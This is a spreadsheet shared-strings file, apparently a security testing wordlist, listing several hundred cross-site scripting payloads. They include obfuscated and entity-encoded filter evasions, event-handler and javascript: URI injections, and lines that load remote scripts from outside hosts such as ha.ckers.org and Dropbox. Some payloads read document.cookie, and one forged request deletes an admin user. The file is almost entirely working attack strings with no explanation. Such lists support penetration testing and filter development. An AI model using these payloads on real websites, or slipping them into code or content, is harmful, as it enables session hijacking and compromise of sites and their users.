    <t>&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"&gt;&lt;?import namespace="t" implementation="#default#time2"&gt;&lt;t:set attributeName="innerHTML" to="XSS&amp;lt;SCRIPT DEFER&amp;gt;javascript:alert(1)&amp;lt;/SCRIPT&amp;gt;"&gt;&lt;/BODY&gt;&lt;/HTML&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT SRC="%(jpg)s"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;HEAD&gt;&lt;META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-</t>
  </si>
  <si>
    <t>&lt;form id="test" /&gt;&lt;button form="test" formaction="javascript:javascript:alert(1)"&gt;X</t>
  </si>
  <si>
    <t>&lt;body onscroll=javascript:alert(1)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br&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE&gt;a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}&lt;/STYLE&gt;</t>
  </si>
  <si>
    <t>&lt;meta charset= "x-imap4-modified-utf7"&amp;&amp;&gt;&amp;&amp;&lt;script&amp;&amp;&gt;javascript:alert(1)&amp;&amp;;&amp;&amp;&lt;&amp;&amp;/script&amp;&amp;&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT onreadystatechange=javascript:javascript:alert(1);&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;style onreadystatechange=javascript:javascript:alert(1);&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;?xml version="1.0"?&gt;&lt;html:html xmlns:html='http://www.w3.org/1999/xhtml'&gt;&lt;html:script&gt;javascript:alert(1);&lt;/html:script&gt;&lt;/html:html&gt;</t>
  </si>
  <si>
    <t>&lt;embed code=%(scriptlet)s&gt;&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;embed code=javascript:javascript:alert(1);&gt;&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;embed src=%(jscript)s&gt;&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onload=javascript:javascript:alert(1)&gt;&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;object onerror=javascript:javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;embed type="image" src=%(scriptlet)s&gt;&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC="javas]]&lt;![CDATA[cript:javascript:alert(1);"&gt;]]&lt;/C&gt;&lt;X&gt;&lt;/xml&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=&amp;{javascript:alert(1);};&gt;</t>
  </si>
  <si>
    <t>&lt;a href="jav&amp;#65ascript:javascript:alert(1)"&gt;test1&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="jav&amp;#97ascript:javascript:alert(1)"&gt;test1&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;embed width=500 height=500 code="data:text/html,&lt;script&gt;%(payload)s&lt;/script&gt;"&gt;&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;iframe srcdoc="&amp;LT;iframe&amp;sol;srcdoc=&amp;amp;lt;img&amp;sol;src=&amp;amp;apos;&amp;amp;apos;onerror=javascript:alert(1)&amp;amp;gt;&gt;"&gt;</t>
  </si>
  <si>
    <t>;alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";</t>
  </si>
  <si>
    <t>alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--</t>
  </si>
  <si>
    <t>&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>';!--"&lt;XSS&gt;=&amp;{()}</t>
  </si>
  <si>
    <t>&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="javascript:alert('XSS');"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=javascript:alert('XSS')&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=javascript:alert("XSS")&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=`javascript:alert("RSnake says, 'XSS'")`&gt;</t>
  </si>
  <si>
    <t>&lt;a onmouseover="alert(document.cookie)"&gt;xxs link&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a onmouseover=alert(document.cookie)&gt;xxs link&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;IMG """&gt;&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=# onmouseover="alert('xxs')"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC= onmouseover="alert('xxs')"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG onmouseover="alert('xxs')"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="jav</t>
  </si>
  <si>
    <t>&lt;IMG SRC="jav&amp;#x09;ascript:alert('XSS');"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="jav&amp;#x0A;ascript:alert('XSS');"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="jav&amp;#x0D;ascript:alert('XSS');"&gt;</t>
  </si>
  <si>
    <t>perl -e 'print "&lt;IMG SRC=java\0script:alert(\"XSS\")&gt;";' &gt; out</t>
  </si>
  <si>
    <t>&lt;IMG SRC=" &amp;#14;  javascript:alert('XSS');"&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT/SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;&lt;SCRIPT&gt;alert("XSS");//&lt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt; B &gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="javascript:alert('XSS')"</t>
  </si>
  <si>
    <t>&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;</t>
  </si>
  <si>
    <t>\";alert('XSS');//</t>
  </si>
  <si>
    <t>&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"&gt;</t>
  </si>
  <si>
    <t>&lt;BODY BACKGROUND="javascript:alert('XSS')"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG DYNSRC="javascript:alert('XSS')"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG LOWSRC="javascript:alert('XSS')"&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE&gt;li {list-style-image: url("javascript:alert('XSS')");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC='vbscript:msgbox("XSS")'&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="livescript:[code]"&gt;</t>
  </si>
  <si>
    <t>&lt;BODY ONLOAD=alert('XSS')&gt;</t>
  </si>
  <si>
    <t>&lt;BGSOUND SRC="javascript:alert('XSS');"&gt;</t>
  </si>
  <si>
    <t>&lt;BR SIZE="&amp;{alert('XSS')}"&gt;</t>
  </si>
  <si>
    <t>&lt;LINK REL="stylesheet" HREF="javascript:alert('XSS');"&gt;</t>
  </si>
  <si>
    <t>&lt;LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;</t>
  </si>
  <si>
    <t>&lt;META HTTP-EQUIV="Link" Content="&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet"&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE&gt;BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}&lt;/STYLE&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert("XSS")';&lt;/STYLE&gt;</t>
  </si>
  <si>
    <t>&lt;IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"&gt;</t>
  </si>
  <si>
    <t>exp/*&lt;A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE TYPE="text/javascript"&gt;alert('XSS');&lt;/STYLE&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE&gt;.XSS{background-image:url("javascript:alert('XSS')");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE type="text/css"&gt;BODY{background:url("javascript:alert('XSS')")}&lt;/STYLE&gt;</t>
  </si>
  <si>
    <t>&lt;XSS STYLE="xss:expression(alert('XSS'))"&gt;</t>
  </si>
  <si>
    <t>&lt;XSS STYLE="behavior: url(xss.htc);"&gt;</t>
  </si>
  <si>
    <t>¼script¾alert(¢XSS¢)¼/script¾</t>
  </si>
  <si>
    <t>&lt;META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"&gt;</t>
  </si>
  <si>
    <t>&lt;META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"&gt;</t>
  </si>
  <si>
    <t>&lt;META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"&gt;</t>
  </si>
  <si>
    <t>&lt;IFRAME SRC="javascript:alert('XSS');"&gt;&lt;/IFRAME&gt;</t>
  </si>
  <si>
    <t>&lt;IFRAME SRC=# onmouseover="alert(document.cookie)"&gt;&lt;/IFRAME&gt;</t>
  </si>
  <si>
    <t>&lt;FRAMESET&gt;&lt;FRAME SRC="javascript:alert('XSS');"&gt;&lt;/FRAMESET&gt;</t>
  </si>
  <si>
    <t>&lt;TABLE BACKGROUND="javascript:alert('XSS')"&gt;</t>
  </si>
  <si>
    <t>&lt;TABLE&gt;&lt;TD BACKGROUND="javascript:alert('XSS')"&gt;</t>
  </si>
  <si>
    <t>&lt;DIV STYLE="background-image: url(javascript:alert('XSS'))"&gt;</t>
  </si>
  <si>
    <t>&lt;DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"&gt;</t>
  </si>
  <si>
    <t>&lt;DIV STYLE="background-image: url(&amp;#1;javascript:alert('XSS'))"&gt;</t>
  </si>
  <si>
    <t>&lt;DIV STYLE="width: expression(alert('XSS'));"&gt;</t>
  </si>
  <si>
    <t>&lt;BASE HREF="javascript:alert('XSS');//"&gt;</t>
  </si>
  <si>
    <t>&lt;OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"&gt;&lt;/OBJECT&gt;</t>
  </si>
  <si>
    <t>&lt;EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"&gt;&lt;/EMBED&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT SRC="http://ha.ckers.org/xss.jpg"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;!--#exec cmd="/bin/echo '&lt;SCR'"--&gt;&lt;!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'"--&gt;</t>
  </si>
  <si>
    <t>&lt;? echo('&lt;SCR)';echo('IPT&gt;alert("XSS")&lt;/SCRIPT&gt;'); ?&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"&gt;</t>
  </si>
  <si>
    <t>Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser</t>
  </si>
  <si>
    <t>&lt;META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;HEAD&gt;&lt;META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</t>
  </si>
  <si>
    <t>&lt;SCRIPT a="&gt;" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT ="&gt;" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT a="&gt;" '' SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT "a='&gt;'" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT a=`&gt;` SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT a="&gt;'&gt;" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT&gt;document.write("&lt;SCRI");&lt;/SCRIPT&gt;PT SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;A HREF="http://66.102.7.147/"&gt;XSS&lt;/A&gt;</t>
  </si>
  <si>
    <t>&lt;A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"&gt;XSS&lt;/A&gt;</t>
  </si>
  <si>
    <t>&lt;A HREF="http://1113982867/"&gt;XSS&lt;/A&gt;</t>
  </si>
  <si>
    <t>&lt;A HREF="http://0x42.0x0000066.0x7.0x93/"&gt;XSS&lt;/A&gt;</t>
  </si>
  <si>
    <t>&lt;A HREF="http://0102.0146.0007.00000223/"&gt;XSS&lt;/A&gt;</t>
  </si>
  <si>
    <t>&lt;A HREF="htt</t>
  </si>
  <si>
    <t>&lt;iframe %00 src="&amp;Tab;javascript:prompt(1)&amp;Tab;"%00&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;style&gt;{font-family&amp;colon;'&lt;iframe/onload=confirm(1)&gt;'</t>
  </si>
  <si>
    <t>&lt;input/onmouseover="javaSCRIPT&amp;colon;confirm&amp;lpar;1&amp;rpar;"</t>
  </si>
  <si>
    <t>&lt;sVg&gt;&lt;scRipt %00&gt;alert&amp;lpar;1&amp;rpar; {Opera}</t>
  </si>
  <si>
    <t>&lt;img/src=`%00` onerror=this.onerror=confirm(1)</t>
  </si>
  <si>
    <t>&lt;form&gt;&lt;isindex formaction="javascript&amp;colon;confirm(1)"</t>
  </si>
  <si>
    <t>&lt;img src=`%00`&amp;NewLine; onerror=alert(1)&amp;NewLine;</t>
  </si>
  <si>
    <t>&lt;script/&amp;Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&amp;Tab;&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;ScRipT 5-0*3+9/3=&gt;prompt(1)&lt;/ScRipT giveanswerhere=?</t>
  </si>
  <si>
    <t>&lt;iframe/src="data:text/html;&amp;Tab;base64&amp;Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="&gt;</t>
  </si>
  <si>
    <t>&lt;script /*%00*/&gt;/*%00*/alert(1)/*%00*/&lt;/script /*%00*/</t>
  </si>
  <si>
    <t>&amp;#34;&amp;#62;&lt;h1/onmouseover='\u0061lert(1)'&gt;%00</t>
  </si>
  <si>
    <t>&lt;iframe/src="data:text/html,&lt;svg &amp;#111;&amp;#110;load=alert(1)&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;meta content="&amp;NewLine; 1 &amp;NewLine;; JAVASCRIPT&amp;colon; alert(1)" http-equiv="refresh"/&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;script xlink:href=data&amp;colon;,window.open('https://www.google.com/')&gt;&lt;/script</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}</t>
  </si>
  <si>
    <t>&lt;meta http-equiv="refresh" content="0;url=javascript:confirm(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;iframe src=javascript&amp;colon;alert&amp;lpar;document&amp;period;location&amp;rpar;&gt;</t>
  </si>
  <si>
    <t>&lt;form&gt;&lt;a href="javascript:\u0061lert&amp;#x28;1&amp;#x29;"&gt;X</t>
  </si>
  <si>
    <t>&lt;/script&gt;&lt;img/*%00/src="worksinchrome&amp;colon;prompt&amp;#x28;1&amp;#x29;"/%00*/onerror='eval(src)'&gt;</t>
  </si>
  <si>
    <t>&lt;img/&amp;#09;&amp;#10;&amp;#11; src=`~` onerror=prompt(1)&gt;</t>
  </si>
  <si>
    <t>&lt;form&gt;&lt;iframe &amp;#09;&amp;#10;&amp;#11; src="javascript&amp;#58;alert(1)"&amp;#11;&amp;#10;&amp;#09;;&gt;</t>
  </si>
  <si>
    <t>&lt;a href="data:application/x-x509-user-cert;&amp;NewLine;base64&amp;NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&amp;#09;&amp;#10;&amp;#11;&gt;X&lt;/a</t>
  </si>
  <si>
    <t>http://www.google&lt;script .com&gt;alert(document.location)&lt;/script</t>
  </si>
  <si>
    <t>&lt;a&amp;#32;href&amp;#61;&amp;#91;&amp;#00;&amp;#93;"&amp;#00; onmouseover=prompt&amp;#40;1&amp;#41;&amp;#47;&amp;#47;"&gt;XYZ&lt;/a</t>
  </si>
  <si>
    <t>&lt;img/src=@&amp;#32;&amp;#13; onerror = prompt('&amp;#49;')</t>
  </si>
  <si>
    <t>&lt;style/onload=prompt&amp;#40;'&amp;#88;&amp;#83;&amp;#83;'&amp;#41;</t>
  </si>
  <si>
    <t>&lt;script ^__^&gt;alert(String.fromCharCode(49))&lt;/script ^__^</t>
  </si>
  <si>
    <t>&lt;/style &amp;#32;&gt;&lt;script &amp;#32; :-(&gt;/**/alert(document.location)/**/&lt;/script &amp;#32; :-(</t>
  </si>
  <si>
    <t>&amp;#00;&lt;/form&gt;&lt;input type&amp;#61;"date" onfocus="alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;form&gt;&lt;textarea &amp;#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&amp;#x28;1&amp;#x29;'&gt;</t>
  </si>
  <si>
    <t>&lt;script /***/&gt;/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/&lt;/script /***/</t>
  </si>
  <si>
    <t>&lt;iframe srcdoc='&amp;lt;body onload=prompt&amp;lpar;1&amp;rpar;&amp;gt;'&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javascript:void(0)" onmouseover=&amp;NewLine;javascript:alert(1)&amp;NewLine;&gt;X&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;script ~~~&gt;alert(0%0)&lt;/script ~~~&gt;</t>
  </si>
  <si>
    <t>&lt;style/onload=&amp;lt;!--&amp;#09;&amp;gt;&amp;#10;alert&amp;#10;&amp;lpar;1&amp;rpar;&gt;</t>
  </si>
  <si>
    <t>&lt;///style///&gt;&lt;span %2F onmousemove='alert&amp;lpar;1&amp;rpar;'&gt;SPAN</t>
  </si>
  <si>
    <t>&lt;img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&amp;Tab;prompt(1)</t>
  </si>
  <si>
    <t>&amp;#34;&amp;#62;&lt;svg&gt;&lt;style&gt;{-o-link-source&amp;colon;'&lt;body/onload=confirm(1)&gt;'</t>
  </si>
  <si>
    <t>&amp;#13;&lt;blink/&amp;#13; onmouseover=pr&amp;#x6F;mp&amp;#116;(1)&gt;OnMouseOver {Firefox &amp; Opera}</t>
  </si>
  <si>
    <t>&lt;marquee onstart='javascript:alert&amp;#x28;1&amp;#x29;'&gt;^__^</t>
  </si>
  <si>
    <t>&lt;div/style="width:expression(confirm(1))"&gt;X&lt;/div&gt; {IE7}</t>
  </si>
  <si>
    <t>&lt;iframe/%00/ src=javaSCRIPT&amp;colon;alert(1)</t>
  </si>
  <si>
    <t>//&lt;form/action=javascript&amp;#x3A;alert&amp;lpar;document&amp;period;cookie&amp;rpar;&gt;&lt;input/type='submit'&gt;//</t>
  </si>
  <si>
    <t>/*iframe/src*/&lt;iframe/src="&lt;iframe/src=@"/onload=prompt(1) /*iframe/src*/&gt;</t>
  </si>
  <si>
    <t>//|\\ &lt;script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'&gt; //|\\ &lt;/script //|\\</t>
  </si>
  <si>
    <t>&lt;/font&gt;/&lt;svg&gt;&lt;style&gt;{src&amp;#x3A;'&lt;style/onload=this.onload=confirm(1)&gt;'&lt;/font&gt;/&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;a/href="javascript:&amp;#13; javascript:prompt(1)"&gt;&lt;input type="X"&gt;</t>
  </si>
  <si>
    <t>&lt;/plaintext\&gt;&lt;/|\&gt;&lt;plaintext/onmouseover=prompt(1)</t>
  </si>
  <si>
    <t>&lt;/svg&gt;''&lt;svg&gt;&lt;script 'AQuickBrownFoxJumpsOverTheLazyDog'&gt;alert&amp;#x28;1&amp;#x29; {Opera}</t>
  </si>
  <si>
    <t>&lt;a href="javascript&amp;colon;\u0061&amp;#x6C;&amp;#101%72t&amp;lpar;1&amp;rpar;"&gt;&lt;button&gt;</t>
  </si>
  <si>
    <t>&lt;div onmouseover='alert&amp;lpar;1&amp;rpar;'&gt;DIV&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;a href="jAvAsCrIpT&amp;colon;alert&amp;lpar;1&amp;rpar;"&gt;X&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"&gt;</t>
  </si>
  <si>
    <t>&lt;object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"&gt;</t>
  </si>
  <si>
    <t>&lt;var onmouseover="prompt(1)"&gt;On Mouse Over&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;a href=javascript&amp;colon;alert&amp;lpar;document&amp;period;cookie&amp;rpar;&gt;Click Here&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;img src="/" =_=" title="onerror='prompt(1)'"&gt;</t>
  </si>
  <si>
    <t>&lt;%&lt;!--'%&gt;&lt;script&gt;alert(1);&lt;/script --&gt;</t>
  </si>
  <si>
    <t>&lt;script src="data:text/javascript,alert(1)"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;iframe/src \/\/onload = prompt(1)</t>
  </si>
  <si>
    <t>&lt;iframe/onreadystatechange=alert(1)</t>
  </si>
  <si>
    <t>&lt;svg/onload=alert(1)</t>
  </si>
  <si>
    <t>&lt;input value=&lt;&gt;&lt;iframe/src=javascript:confirm(1)</t>
  </si>
  <si>
    <t>&lt;input type="text" value=`` &lt;div/onmouseover='alert(1)'&gt;X&lt;/div&gt;</t>
  </si>
  <si>
    <t>http://www.&lt;script&gt;alert(1)&lt;/script .com</t>
  </si>
  <si>
    <t>&lt;iframe src=j&amp;NewLine;&amp;Tab;a&amp;NewLine;&amp;Tab;&amp;Tab;v&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;a&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;s&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;c&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;r&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;i&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;p&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;t&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;colon;a&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;l&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;e&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;r&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;t&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;28&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;1&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;%29&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;script ?&gt;alert(1)</t>
  </si>
  <si>
    <t>&lt;iframe src=j&amp;Tab;a&amp;Tab;v&amp;Tab;a&amp;Tab;s&amp;Tab;c&amp;Tab;r&amp;Tab;i&amp;Tab;p&amp;Tab;t&amp;Tab;:a&amp;Tab;l&amp;Tab;e&amp;Tab;r&amp;Tab;t&amp;Tab;%28&amp;Tab;1&amp;Tab;%29&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;img src=`xx:xx`onerror=alert(1)&gt;</t>
  </si>
  <si>
